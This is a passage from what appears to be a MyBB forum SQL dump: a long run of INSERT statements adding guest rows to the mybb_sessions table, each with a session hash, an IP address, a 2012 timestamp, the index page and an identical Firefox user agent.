`useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dafe87292a6435a8751b766608d922b8', '0', '90.120.149.175', '1352772763', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('247f39b74758b64bb67310599d93c30b', '0', '22.148.236.219', '1352772764', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0c9c90b8e4499cfd613ed626ec067b56', '0', '221.168.34.143', '1352772765', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('494d9c7f315a5e817f451a0c1c3911a6', '0', '67.20.95.138', '1352772766', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5a77bd00ad826d02d6a4a959bfe689c7', '0', '16.239.78.5', '1352772767', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bbdfda1c961a59dde55fd9b58582f91c', '0', '133.31.95.201', '1352772768', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b3c1513a9da115da84b1303b5615642d', '0', '74.245.205.108', '1352772768', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5675c24aa1c41af219a8228fdc13020b', '0', '130.96.105.144', '1352772769', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c15cef192c040f18cd8ffcd034c593d2', '0', '18.162.202.240', '1352772770', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0da743c529b5065583f124a3f6548464', '0', '70.54.157.218', '1352772770', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bd1cc3f0b974d1af0382584b9f7088bd', '0', '91.129.136.157', '1352772771', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ff1b62c46985900c413a016a37dba21c', '0', '145.215.100.159', '1352772771', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5542f1af9756e27ec38f7e542bf8f9a3', '0', '33.144.164.6', '1352772772', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b92030dd7cc8a89d893d7cdb9026d69d', '0', '226.118.247.243', '1352772772', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fad137571e70ca03692ee1835276e9fc', '0', '131.108.43.10', '1352772773', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ae76684789bcdb492c0c1092a9f37c22', '0', '170.83.206.25', '1352772774', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('571ab71c6351011d9773a441ca673913', '0', '183.152.167.180', '1352772775', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ae96769e58113713a2f84353b7ffa871', '0', '154.118.121.37', '1352772775', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c32be2e08d0ed37a18691e437e9eea3f', '0', '213.175.52.188', '1352772776', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('191125d1a4b1c51f517ce434134c1e52', '0', '157.166.208.142', '1352772777', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5ccf52cac1d49c40dc9bae34d60aa30a', '0', '14.61.89.240', '1352772777', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4251f167664cabe7f2827b163353d5ea', '0', '149.24.151.23', '1352772778', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d5cca9d80f0102c1fce5b31ea1bc2bbe', '0', '172.101.185.94', '1352772779', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e818893f214da6cac3fe79f9367f5df2', '0', '227.81.55.9', '1352772780', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6dcc8ad5d703644d2cb7630d29ca283a', '0', '58.20.161.212', '1352772781', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6ce6697c1c4ed64d1173bbd3b56bfe2b', '0', '113.219.150.249', '1352772782', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('82b7786d442d03216246a99f3269057b', '0', '80.25.207.32', '1352772783', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('82b9fb81353f2b37d7ecb5cd53b3ca84', '0', '241.4.150.125', '1352772784', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4d77f35fa7b026ae67810c705920207f', '0', '206.184.105.204', '1352772785', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fb7b7f2958f80f509fb858786a34bde5', '0', '110.110.245.254', '1352772785', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('20dfb87be1555bcde32006fa9ceb17ec', '0', '63.199.129.245', '1352772786', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('907473e19bd2b9c8f3534d31167ab37e', '0', '122.140.171.7', '1352772787', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8ad9ac05b339670398953adc51d7c57e', '0', '171.104.5.35', '1352772788', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5a4ce82d9e0f5f2bef9e61cbe8996acc', '0', '116.251.17.242', '1352772789', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('58d26a01564246a981804091853ba412', '0', '182.161.193.97', '1352772790', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cf1a08053cccb4dda688eab62bbfb05d', '0', '113.83.13.235', '1352772791', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('13a45c1534b0b3d97230a34174dd7072', '0', '167.199.51.87', '1352772792', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3e7f7348a66cba6ab6243e4bce355e5c', '0', '169.219.43.157', '1352772793', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3f4a297d5262925dfa90ff69636d6c57', '0', '95.159.227.105', '1352772794', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ebccdfb23b16ae4f36d422177d8c56c5', '0', '33.191.80.92', '1352772795', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('258c715a8a56367dea60ac613c985192', '0', '105.83.98.208', '1352772796', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6952970f047e54b6125aa90f89744686', '0', '47.0.26.96', '1352772796', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a8283e3870a0203ba98d494298b6f21e', '0', '68.242.216.53', '1352772797', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('500b2dc203effee67bcd1e7b3cdbdfdc', '0', '68.12.232.215', '1352772798', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cd7cdefa8754a257bd853043d8c65646', '0', '131.5.90.233', '1352772798', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ea853736804889915546d47ba3dbcfbf', '0', '211.201.191.80', '1352772799', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ed2e237e0c6187268b65adf6cb0646cf', '0', '254.58.98.142', '1352772801', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8a98f98b1c65a222616e577e5b1f98ed', '0', '74.183.42.171', '1352772802', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4d530d91fe384f2b1259c1941711aa89', '0', '127.212.162.249', '1352772802', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d263cc0ea30160a77df84cadb45f060e', '0', '57.119.110.200', '1352772803', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('89cd7c449058747db9f8d3e52586da3f', '0', '233.163.31.109', '1352772804', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('62512bbd26fff5f66d1dcf308b402436', '0', '106.6.21.133', '1352772805', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f485c8ecab65da2d0df05b1852bb9502', '0', '153.49.63.48', '1352772806', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('14de2c1f700fc66b86db4d8be142751b', '0', '146.92.97.204', '1352772807', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a5edf103523c897b7256fd550f86fe45', '0', '100.251.206.83', '1352772808', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('403917b9d9dcb12287022716076083c3', '0', '248.126.3.236', '1352772809', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('60f003cc6662686e31d4d8c77027c3fb', '0', '59.247.217.244', '1352772809', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('60a506a6f23a623f6f6c1e4bc4bf1565', '0', '116.68.209.7', '1352772810', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fbf2f83459ca93a45babda51314865e2', '0', '60.98.55.223', '1352772811', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9f0032d822c589c350a77ce77b38c8e9', '0', '143.137.44.223', '1352772811', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4f20cada43da485504a72c29097643e4', '0', '163.118.116.171', '1352772812', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8b30a3f1c594a28a7f1c4fec064118df', '0', '224.103.94.139', '1352772812', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('22f1077de17294f23fcf557125558d12', '0', '87.131.130.114', '1352772813', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('37c944199643ba2c09229b6279e27d28', '0', '15.148.147.209', '1352772814', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cff55096b532b2cc52118bcd07cbfc3c', '0', '148.23.220.162', '1352772814', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d68b19836f23191315ec3fe453ee6770', '0', '107.51.184.255', '1352772815', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3a1fc4360d564e84fb0fafdf22d0aead', '0', '221.107.53.148', '1352772816', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('312417127f6dd7a90aaa5f94e72447cb', '0', '61.81.248.122', '1352772817', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4f77489074789b28d45d4e7865017a8d', '0', '96.83.146.27', '1352772818', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('46767a10b45d3991ea23bc6a1bf23a32', '0', '161.250.174.172', '1352772819', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('27f5f6139010d22ce77f34fec3834600', '0', '130.219.195.216', '1352772820', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e09b3abd9b4c3dbc4f8f430228c44be0', '0', '69.97.237.119', '1352772820', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2c3b673379feec9325d18cf5fe2abcb9', '0', '112.106.81.124', '1352772821', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ea5c7ad6d11bac8f72b21651a1593635', '0', '27.247.185.157', '1352772822', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4a4549a162d16a80fa63ee6e9fb661cc', '0', '142.143.81.97', '1352772825', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c949597762b070eb95bae9ffe74cbe2d', '0', '144.23.184.213', '1352772826', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2123d112ce73fb01eb345e7c89f73978', '0', '145.174.38.190', '1352772826', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('66618eff366f87d66a66077eccbe31e8', '0', '244.156.33.115', '1352772827', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c9e1af9c9fc00b5ce98dd046ae070b29', '0', '24.26.91.230', '1352772828', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6ce5e2a07d07cc4165062694a4f89230', '0', '153.189.95.211', '1352772830', '/index.php?', 